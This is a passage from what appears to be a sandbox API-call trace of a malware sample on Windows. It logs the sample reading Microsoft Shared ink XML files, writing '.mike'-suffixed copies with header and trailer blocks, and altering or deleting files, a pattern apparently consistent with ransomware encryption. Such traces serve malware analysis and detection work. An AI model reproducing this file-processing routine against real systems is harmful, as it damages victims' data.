shared\\ink\\ipsrom.xml"), fInfoLevelId=0x0, lpFileInformation=0x2229fc8 | out: lpFileInformation=0x2229fc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54)) returned 1 [0044.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.006] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.006] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.006] GetFileType (hFile=0x264) returned 0x1 [0044.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.006] GetFileType (hFile=0x264) returned 0x1 [0044.006] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0044.006] WriteFile (in: hFile=0x264, lpBuffer=0x222ad1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x222ad1c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0044.007] CloseHandle (hObject=0x264) returned 1 [0044.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0044.008] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), fInfoLevelId=0x0, lpFileInformation=0x222a860 | out: lpFileInformation=0x222a860*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54)) returned 1 [0044.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0044.008] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0044.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.008] GetFileType (hFile=0x264) returned 0x1 [0044.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0044.008] GetFileType (hFile=0x264) returned 0x1 [0044.008] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0044.008] ReadFile (in: hFile=0x264, lpBuffer=0x222be30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x222be30*, lpNumberOfBytesRead=0x2af0c8*=0xa54, lpOverlapped=0x0) returned 1 [0044.011] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.011] GetFileType (hFile=0x264) returned 0x1 [0044.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.011] GetFileType (hFile=0x264) returned 0x1 [0044.011] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0044.011] WriteFile (in: hFile=0x264, lpBuffer=0x2232ae8*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2232ae8*, lpNumberOfBytesWritten=0x2af0bc*=0xa60, lpOverlapped=0x0) returned 1 [0044.011] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0044.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.011] GetFileType (hFile=0x264) returned 0x1 [0044.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0044.012] GetFileType (hFile=0x264) returned 0x1 [0044.013] WriteFile (in: hFile=0x264, lpBuffer=0x2235cfc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2235cfc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0044.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.013] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46e4580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46e4580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe470a6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0044.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.013] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22373ac | out: lpFileInformation=0x22373ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46e4580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46e4580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe470a6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0044.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", dwFileAttributes=0x80) returned 0 [0044.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0044.015] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46e4580, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46e4580, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe470a6e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc80)) returned 1 [0044.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0044.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpFilePart=0x0) returned 0x3d [0044.015] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike", lpFilePart=0x0) returned 0x42 [0044.015] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.mike")) returned 1 [0044.016] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.016] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0044.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0044.065] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0044.065] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.065] GetFileType (hFile=0x264) returned 0x1 [0044.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0044.065] GetFileType (hFile=0x264) returned 0x1 [0044.065] CloseHandle (hObject=0x264) returned 1 [0044.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.066] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0044.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0044.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0044.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), fInfoLevelId=0x0, lpFileInformation=0x223930c | out: lpFileInformation=0x223930c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee)) returned 1 [0044.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0044.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), fInfoLevelId=0x0, lpFileInformation=0x22395fc | out: lpFileInformation=0x22395fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee)) returned 1 [0044.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0044.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.067] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpFilePart=0x0) returned 0x3d [0044.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.067] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike", lpFilePart=0x0) returned 0x42 [0044.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0044.067] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.068] GetFileType (hFile=0x264) returned 0x1 [0044.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0044.068] GetFileType (hFile=0x264) returned 0x1 [0044.068] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0044.068] WriteFile (in: hFile=0x264, lpBuffer=0x223a350*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x223a350*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0044.069] CloseHandle (hObject=0x264) returned 1 [0044.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0044.069] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), fInfoLevelId=0x0, lpFileInformation=0x2239e94 | out: lpFileInformation=0x2239e94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee)) returned 1 [0044.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0044.069] GetFullPathNameW (in: 